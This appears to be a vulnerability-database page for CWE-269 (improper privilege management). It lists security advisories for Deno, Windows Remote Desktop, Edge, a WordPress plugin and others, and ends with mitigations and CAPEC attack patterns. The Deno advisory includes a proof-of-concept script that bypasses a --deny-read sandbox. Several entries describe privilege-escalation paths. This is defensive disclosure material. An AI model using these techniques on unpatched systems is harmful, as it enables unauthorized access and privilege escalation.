Common Weakness Enumeration

CWE-269

Discouraged

Improper Privilege Management

Abstraction: Class · Status: Draft

The product does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor.

5455 vulnerabilities reference this CWE, most recent first.

GHSA-QPPX-835V-JVWP

Vulnerability from github – Published: 2026-02-10 18:30 – Updated: 2026-03-27 21:31
VLAI
Details

Improper privilege management in Windows Remote Desktop allows an authorized attacker to elevate privileges locally.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-21533"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-269"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-02-10T18:16:35Z",
    "severity": "HIGH"
  },
  "details": "Improper privilege management in Windows Remote Desktop allows an authorized attacker to elevate privileges locally.",
  "id": "GHSA-qppx-835v-jvwp",
  "modified": "2026-03-27T21:31:32Z",
  "published": "2026-02-10T18:30:42Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-21533"
    },
    {
      "type": "WEB",
      "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21533"
    },
    {
      "type": "WEB",
      "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-21533"
    },
    {
      "type": "WEB",
      "url": "https://www.vicarius.io/vsociety/posts/cve-2026-21533-detection-script-privilege-escalation-vulnerability-in-windows-remote-desktop"
    },
    {
      "type": "WEB",
      "url": "https://www.vicarius.io/vsociety/posts/cve-2026-21533-mitigation-script-privilege-escalation-vulnerability-in-windows-remote-desktop"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-QQ26-84MH-26J9

Vulnerability from github – Published: 2025-10-08 17:56 – Updated: 2025-10-08 17:56
VLAI
Summary
Deno's --deny-read check does not prevent permission bypass
Details

Summary

Deno.FsFile.prototype.stat and Deno.FsFile.prototype.statSync are not limited by the permission model check --deny-read=./.

It's possible to retrieve stats from files that the user do not have explicit read access to (the script is executed with --deny-read=./)

Similar APIs like Deno.stat and Deno.statSync require allow-read permission, however, when a file is opened, even with file-write only flags and deny-read permission, it's still possible to retrieve file stats, and thus bypass the permission model.

PoC

Setup:

deno --version
deno 2.4.2 (stable, release, x86_64-unknown-linux-gnu)
v8 13.7.152.14-rusty
typescript 5.8.3

touch test1.txt
  • poc_file.stat.ts
// touch test1.txt
// https://docs.deno.com/api/deno/~/Deno.FsFile.prototype.stat
// deno run --deny-read=./ --allow-write=./ poc_file.stat.ts 1
// deno run --allow-write=./ poc_file.stat.ts 1
async function poc1(){
    using file = await Deno.open("./test1.txt", { read: false, write: true});
    const fileInfo = await file.stat();
    console.log(fileInfo.isFile);
}

// https://docs.deno.com/api/deno/~/Deno.FsFile.prototype.statSync
// deno run --deny-read=./ --allow-write=./ poc_file.stat.ts 2
// deno run --allow-write=./ poc_file.stat.ts 2
function poc2(){
    using file = Deno.openSync("./test1.txt", { read: false, write: true});
    const fileInfo = file.statSync();
    console.log(fileInfo.isFile);
}

// https://docs.deno.com/api/deno/~/Deno.stat
// deno run --deny-read=./ --allow-write=./ poc_file.stat.ts 3
// deno run --allow-write=./ poc_file.stat.ts 3
async function poc3(){
    // not executed
    const fileInfo = await Deno.stat("./test1.txt");
    console.log(fileInfo.isFile);
}

// https://docs.deno.com/api/deno/~/Deno.statSync
// deno run --deny-read=./ --allow-write=./ poc_file.stat.ts 4
// deno run --allow-write=./ poc_file.stat.ts 4
function poc4(){
    // not executed
    const fileInfo = Deno.statSync("./test1.txt");
    console.log(fileInfo.isFile);
}


async function main(){
    const poc = Deno.args[0] || 1;

    const status = await Deno.permissions.query({ name: "read", path: "./" });
    console.log(status);
    switch (poc) {
        case "1":
            poc1()
            break;
        case "2":
            poc2()
            break;
        case "3":
            poc3()
            break;
        case "4":
            poc4()
            break;
        default:
            poc1()
    }
}

main()

Output: - deno run --deny-read=./ --allow-write=./ poc_file.stat.ts 1

PermissionStatus { state: "denied", onchange: null }
true
  • deno run --deny-read=./ --allow-write=./ poc_file.stat.ts 2
PermissionStatus { state: "denied", onchange: null }
true
  • deno run --deny-read=./ --allow-write=./ poc_file.stat.ts 3
PermissionStatus { state: "denied", onchange: null }
error: Uncaught (in promise) NotCapable: Requires read access to "./test1.txt", run again with the --allow-read flag
    const fileInfo = await Deno.stat("./test1.txt");
                                ^
    ...
  • deno run --deny-read=./ --allow-write=./ poc_file.stat.ts 4
PermissionStatus { state: "denied", onchange: null }
error: Uncaught (in promise) NotCapable: Requires read access to "./test1.txt", run again with the --allow-read flag
    const fileInfo = Deno.statSync("./test1.txt");
                          ^
    ...

Impact

Permission model bypass

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "crates.io",
        "name": "deno"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.5.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-61786"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-269"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-10-08T17:56:40Z",
    "nvd_published_at": "2025-10-08T01:15:33Z",
    "severity": "LOW"
  },
  "details": "### Summary \n\n`Deno.FsFile.prototype.stat` and `Deno.FsFile.prototype.statSync` are not limited by the permission model check `--deny-read=./`.\n\nIt\u0027s possible to retrieve stats from files that the user do not have explicit read access to  (the script is executed with `--deny-read=./`)\n\nSimilar APIs like `Deno.stat` and `Deno.statSync` require\u00a0`allow-read`\u00a0permission, however, when a file is opened, even with file-write only flags and deny-read permission, it\u0027s still possible to retrieve file stats, and thus bypass the permission model.\n\n### PoC\n\nSetup:\n```\ndeno --version\ndeno 2.4.2 (stable, release, x86_64-unknown-linux-gnu)\nv8 13.7.152.14-rusty\ntypescript 5.8.3\n\ntouch test1.txt\n```\n\n- `poc_file.stat.ts`\n```ts\n// touch test1.txt\n// https://docs.deno.com/api/deno/~/Deno.FsFile.prototype.stat\n// deno run --deny-read=./ --allow-write=./ poc_file.stat.ts 1\n// deno run --allow-write=./ poc_file.stat.ts 1\nasync function poc1(){\n    using file = await Deno.open(\"./test1.txt\", { read: false, write: true});\n    const fileInfo = await file.stat();\n    console.log(fileInfo.isFile);\n}\n\n// https://docs.deno.com/api/deno/~/Deno.FsFile.prototype.statSync\n// deno run --deny-read=./ --allow-write=./ poc_file.stat.ts 2\n// deno run --allow-write=./ poc_file.stat.ts 2\nfunction poc2(){\n    using file = Deno.openSync(\"./test1.txt\", { read: false, write: true});\n    const fileInfo = file.statSync();\n    console.log(fileInfo.isFile);\n}\n\n// https://docs.deno.com/api/deno/~/Deno.stat\n// deno run --deny-read=./ --allow-write=./ poc_file.stat.ts 3\n// deno run --allow-write=./ poc_file.stat.ts 3\nasync function poc3(){\n    // not executed\n    const fileInfo = await Deno.stat(\"./test1.txt\");\n    console.log(fileInfo.isFile);\n}\n\n// https://docs.deno.com/api/deno/~/Deno.statSync\n// deno run --deny-read=./ --allow-write=./ poc_file.stat.ts 4\n// deno run --allow-write=./ poc_file.stat.ts 4\nfunction poc4(){\n    // not executed\n    const fileInfo = Deno.statSync(\"./test1.txt\");\n    console.log(fileInfo.isFile);\n}\n\n\nasync function main(){\n    const poc = Deno.args[0] || 1;\n\n    const status = await Deno.permissions.query({ name: \"read\", path: \"./\" });\n    console.log(status);\n    switch (poc) {\n        case \"1\":\n            poc1()\n            break;\n        case \"2\":\n            poc2()\n            break;\n        case \"3\":\n            poc3()\n            break;\n        case \"4\":\n            poc4()\n            break;\n        default:\n            poc1()\n    }\n}\n\nmain()\n```\n\n\nOutput:\n- `deno run --deny-read=./ --allow-write=./ poc_file.stat.ts 1`\n```\nPermissionStatus { state: \"denied\", onchange: null }\ntrue\n```\n\n- `deno run --deny-read=./ --allow-write=./ poc_file.stat.ts 2`\n```\nPermissionStatus { state: \"denied\", onchange: null }\ntrue\n```\n\n- `deno run --deny-read=./ --allow-write=./ poc_file.stat.ts 3`\n```\nPermissionStatus { state: \"denied\", onchange: null }\nerror: Uncaught (in promise) NotCapable: Requires read access to \"./test1.txt\", run again with the --allow-read flag\n    const fileInfo = await Deno.stat(\"./test1.txt\");\n                                ^\n    ...\n```\n\n- `deno run --deny-read=./ --allow-write=./ poc_file.stat.ts 4`\n```\nPermissionStatus { state: \"denied\", onchange: null }\nerror: Uncaught (in promise) NotCapable: Requires read access to \"./test1.txt\", run again with the --allow-read flag\n    const fileInfo = Deno.statSync(\"./test1.txt\");\n                          ^\n    ...\n```\n\n\n### Impact\n\nPermission model bypass",
  "id": "GHSA-qq26-84mh-26j9",
  "modified": "2025-10-08T17:56:40Z",
  "published": "2025-10-08T17:56:40Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/denoland/deno/security/advisories/GHSA-qq26-84mh-26j9"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61786"
    },
    {
      "type": "WEB",
      "url": "https://github.com/denoland/deno/pull/30876"
    },
    {
      "type": "WEB",
      "url": "https://github.com/denoland/deno/commit/1ab2268c0bcbf9b0468e0e36963f77f8c31c73ec"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/denoland/deno"
    },
    {
      "type": "WEB",
      "url": "https://github.com/denoland/deno/releases/tag/v2.2.15"
    },
    {
      "type": "WEB",
      "url": "https://github.com/denoland/deno/releases/tag/v2.5.3"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Deno\u0027s --deny-read check does not prevent permission bypass"
}

GHSA-QQ2J-9PF8-G58C

Vulnerability from github – Published: 2023-03-12 06:30 – Updated: 2025-03-04 22:21
VLAI
Summary
Company admin role gives excessive privileges in eZ Platform Ibexa
Details

Users with the Company admin role (introduced by the company account feature in v4) can assign any role to any user. This also applies to any other user that has the role / assign policy. Any subtree limitation in place does not have any effect.

The role / assign policy is typically only given to administrators, which limits the scope in most cases, but please verify who has this policy in your installaton. The fix ensures that subtree limitations are working as intended.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "ezsystems/ezpublish-kernel"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "7.5.0"
            },
            {
              "fixed": "7.5.30"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "ezsystems/ezplatform-kernel"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.3.0"
            },
            {
              "fixed": "1.3.26"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2022-48365"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-269"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-03-13T20:57:31Z",
    "nvd_published_at": "2023-03-12T05:15:00Z",
    "severity": "HIGH"
  },
  "details": "Users with the Company admin role (introduced by the company account feature in v4) can assign any role to any user. This also applies to any other user that has the role / assign policy. Any subtree limitation in place does not have any effect.\n\nThe role / assign policy is typically only given to administrators, which limits the scope in most cases, but please verify who has this policy in your installaton. The fix ensures that subtree limitations are working as intended.",
  "id": "GHSA-qq2j-9pf8-g58c",
  "modified": "2025-03-04T22:21:44Z",
  "published": "2023-03-12T06:30:21Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/ezsystems/ezplatform-kernel/security/advisories/GHSA-8h83-chh2-fchp"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ezsystems/ezpublish-kernel/security/advisories/GHSA-99r3-xmmq-7q7g"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-48365"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ezsystems/ezpublish-kernel/commit/957e67a08af2b3265753f9763943e8225ed779ab"
    },
    {
      "type": "WEB",
      "url": "https://developers.ibexa.co/security-advisories/ibexa-sa-2022-009-critical-vulnerabilities-in-graphql-role-assignment-ct-editing-and-drafts-tooltips"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/ezsystems/ezpublish-kernel"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Company admin role gives excessive privileges in eZ Platform Ibexa"
}

GHSA-QQ37-J4M8-2HHR

Vulnerability from github – Published: 2023-09-22 06:30 – Updated: 2024-04-04 07:48
VLAI
Details

Certain WithSecure products allow Local privilege escalation via the lhz archive unpack handler. This affects WithSecure Client Security 15, WithSecure Server Security 15, WithSecure Email and Server Security 15, WithSecure Elements Endpoint Protection 17 and later, WithSecure Client Security for Mac 15, WithSecure Elements Endpoint Protection for Mac 17 and later, Linux Security 64 12.0 , Linux Protection 12.0, and WithSecure Atlant (formerly F-Secure Atlant) 1.0.35-1.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-43766"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-269"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-09-22T05:15:09Z",
    "severity": "HIGH"
  },
  "details": "Certain WithSecure products allow Local privilege escalation via the lhz archive unpack handler. This affects WithSecure Client Security 15, WithSecure Server Security 15, WithSecure Email and Server Security 15, WithSecure Elements Endpoint Protection 17 and later, WithSecure Client Security for Mac 15, WithSecure Elements Endpoint Protection for Mac 17 and later, Linux Security 64 12.0 , Linux Protection 12.0, and WithSecure Atlant (formerly F-Secure Atlant) 1.0.35-1.",
  "id": "GHSA-qq37-j4m8-2hhr",
  "modified": "2024-04-04T07:48:09Z",
  "published": "2023-09-22T06:30:19Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43766"
    },
    {
      "type": "WEB",
      "url": "https://www.withsecure.com/en/support/security-advisories"
    },
    {
      "type": "WEB",
      "url": "https://www.withsecure.com/en/support/security-advisories/cve-2023-nnn4"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-QQ3R-4722-JG4H

Vulnerability from github – Published: 2022-07-08 00:00 – Updated: 2025-01-02 21:31
VLAI
Details

Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-30192, CVE-2022-33638, CVE-2022-33639.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-33680"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-269"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-07-07T20:15:00Z",
    "severity": "HIGH"
  },
  "details": "Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-30192, CVE-2022-33638, CVE-2022-33639.",
  "id": "GHSA-qq3r-4722-jg4h",
  "modified": "2025-01-02T21:31:39Z",
  "published": "2022-07-08T00:00:43Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-33680"
    },
    {
      "type": "WEB",
      "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-33680"
    },
    {
      "type": "WEB",
      "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-33680"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-QQ4Q-JV8X-6FJM

Vulnerability from github – Published: 2026-07-16 09:32 – Updated: 2026-07-16 09:32
VLAI
Details

The WPFunnels – Funnel Builder for WooCommerce with Checkout & One Click Upsell plugin for WordPress is vulnerable to Privilege Escalation via arbitrary option update in all versions up to, and including, 3.12.8. This is due to the update_settings() REST callback failing to validate the group_id path parameter against an allowlist of permitted option names before passing it directly to get_option() and update_option(), allowing the built-in wp_user_roles option — which satisfies the route's loose [\w-]+ regex — to be targeted. This makes it possible for authenticated attackers with the wpf_manage_funnels capability and above to elevate their privileges to administrator by writing a crafted role definition containing arbitrary capabilities into the wp_user_roles option, thereby granting any WordPress role full site administrator access. The wpf_manage_funnels capability is typically assigned to the Funnel Manager custom role created by the plugin, meaning this role is the minimum required to exploit the vulnerability.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-15103"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-269"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-07-16T09:16:17Z",
    "severity": "HIGH"
  },
  "details": "The WPFunnels \u2013 Funnel Builder for WooCommerce with Checkout \u0026 One Click Upsell plugin for WordPress is vulnerable to Privilege Escalation via arbitrary option update in all versions up to, and including, 3.12.8. This is due to the `update_settings()` REST callback failing to validate the `group_id` path parameter against an allowlist of permitted option names before passing it directly to `get_option()` and `update_option()`, allowing the built-in `wp_user_roles` option \u2014 which satisfies the route\u0027s loose `[\\w-]+` regex \u2014 to be targeted. This makes it possible for authenticated attackers with the `wpf_manage_funnels` capability and above to elevate their privileges to administrator by writing a crafted role definition containing arbitrary capabilities into the `wp_user_roles` option, thereby granting any WordPress role full site administrator access. The `wpf_manage_funnels` capability is typically assigned to the Funnel Manager custom role created by the plugin, meaning this role is the minimum required to exploit the vulnerability.",
  "id": "GHSA-qq4q-jv8x-6fjm",
  "modified": "2026-07-16T09:32:17Z",
  "published": "2026-07-16T09:32:17Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-15103"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/browser/wpfunnels/tags/3.12.8/includes/core/rest-api/Controllers/class-settings-controller.php#L40"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/browser/wpfunnels/tags/3.12.8/includes/core/rest-api/Controllers/class-settings-controller.php#L462"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/browser/wpfunnels/tags/3.12.8/includes/core/rest-api/Controllers/class-settings-controller.php#L66"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/browser/wpfunnels/tags/3.12.8/includes/utils/class-wpfnl-functions.php#L1216"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/changeset?reponame=\u0026old=3607181%40wpfunnels\u0026new=3607181%40wpfunnels"
    },
    {
      "type": "WEB",
      "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/76ad6d21-f277-496f-aa6b-f9d5cb8a3801?source=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-QQ63-9JWC-33MC

Vulnerability from github – Published: 2023-03-03 15:30 – Updated: 2023-03-10 21:30
VLAI
Details

starsoftcomm CooCare 5.304 allows local attackers to escalate privileges and execute arbitrary commands via a crafted file upload.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-45988"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-269"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-03-03T15:15:00Z",
    "severity": "HIGH"
  },
  "details": "starsoftcomm CooCare 5.304 allows local attackers to escalate privileges and execute arbitrary commands via a crafted file upload.",
  "id": "GHSA-qq63-9jwc-33mc",
  "modified": "2023-03-10T21:30:24Z",
  "published": "2023-03-03T15:30:18Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-45988"
    },
    {
      "type": "WEB",
      "url": "https://github.com/happy0717/CVE-2022-45988"
    },
    {
      "type": "WEB",
      "url": "https://github.com/happy0717/StarSoftComm_HP_CooCare_An_elevation_of_privilege_vulnerability_exists/edit/main/README.md"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-QQ6F-VFFW-CC65

Vulnerability from github – Published: 2022-05-24 19:20 – Updated: 2022-07-13 00:01
VLAI
Details

Dell EMC PowerScale Nodes contain a hardware design flaw. This may allow a local unauthenticated user to escalate privileges. This also affects Compliance mode and for Compliance mode clusters, is a critical vulnerability. Dell EMC recommends applying the workaround at your earliest opportunity.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-36315"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-269"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-11-12T23:15:00Z",
    "severity": "HIGH"
  },
  "details": "Dell EMC PowerScale Nodes contain a hardware design flaw. This may allow a local unauthenticated user to escalate privileges. This also affects Compliance mode and for Compliance mode clusters, is a critical vulnerability. Dell EMC recommends applying the workaround at your earliest opportunity.",
  "id": "GHSA-qq6f-vffw-cc65",
  "modified": "2022-07-13T00:01:30Z",
  "published": "2022-05-24T19:20:37Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-36315"
    },
    {
      "type": "WEB",
      "url": "https://www.dell.com/support/kbdoc/en-us/000193005"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-QQ9F-GG6W-VGFX

Vulnerability from github – Published: 2022-05-13 01:10 – Updated: 2022-05-13 01:10
VLAI
Details

An authentication bypass vulnerability in CA Privileged Access Manager 2.8.2 and earlier allows remote attackers to execute arbitrary code or commands by poisoning a configuration file.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2018-9022"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-269"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2018-06-18T18:29:00Z",
    "severity": "CRITICAL"
  },
  "details": "An authentication bypass vulnerability in CA Privileged Access Manager 2.8.2 and earlier allows remote attackers to execute arbitrary code or commands by poisoning a configuration file.",
  "id": "GHSA-qq9f-gg6w-vgfx",
  "modified": "2022-05-13T01:10:49Z",
  "published": "2022-05-13T01:10:49Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-9022"
    },
    {
      "type": "WEB",
      "url": "https://support.ca.com/us/product-content/recommended-reading/security-notices/ca20180614-01--security-notice-for-ca-privileged-access-manager.html"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/155576/Broadcom-CA-Privileged-Access-Manager-2.8.2-Remote-Command-Execution.html"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/104496"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-QQ9P-JH9V-JWWC

Vulnerability from github – Published: 2026-04-02 21:32 – Updated: 2026-04-04 00:31
VLAI
Details

HiSecOS web server contains a privilege escalation vulnerability that allows authenticated users with operator or auditor roles to escalate privileges to the administrator role by sending specially crafted packets to the web server. Attackers can exploit this flaw to gain full administrative access to the affected device.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-7343"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-269"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-04-02T20:16:19Z",
    "severity": "HIGH"
  },
  "details": "HiSecOS web server contains a privilege escalation vulnerability that allows authenticated users with operator or auditor roles to escalate privileges to the administrator role by sending specially crafted packets to the web server. Attackers can exploit this flaw to gain full administrative access to the affected device.",
  "id": "GHSA-qq9p-jh9v-jwwc",
  "modified": "2026-04-04T00:31:25Z",
  "published": "2026-04-02T21:32:53Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-7343"
    },
    {
      "type": "WEB",
      "url": "https://assets.belden.com/m/774e2db2b0100bc1/original/Belden-Security-Bulletin-BSECV-2023-06.pdf"
    },
    {
      "type": "WEB",
      "url": "https://www.vulncheck.com/advisories/belden-industrial-hivision-arbitrary-code-execution-via-malicious-project-file"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

Mitigation MIT-1
Architecture and Design Operation

Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software.

Mitigation MIT-48
Architecture and Design

Strategy: Separation of Privilege

Follow the principle of least privilege when assigning access rights to entities in a software system.

Mitigation MIT-49
Architecture and Design

Strategy: Separation of Privilege

Consider following the principle of separation of privilege. Require multiple conditions to be met before permitting access to a system resource.

CAPEC-122: Privilege Abuse

An adversary is able to exploit features of the target that should be reserved for privileged users or administrators but are exposed to use by lower or non-privileged accounts. Access to sensitive information and functionality must be controlled to ensure that only authorized users are able to access these resources.

CAPEC-233: Privilege Escalation

An adversary exploits a weakness enabling them to elevate their privilege and perform an action that they are not supposed to be authorized to perform.

CAPEC-58: Restful Privilege Elevation

An adversary identifies a Rest HTTP (Get, Put, Delete) style permission method allowing them to perform various malicious actions upon server data due to lack of access control mechanisms implemented within the application service accepting HTTP messages.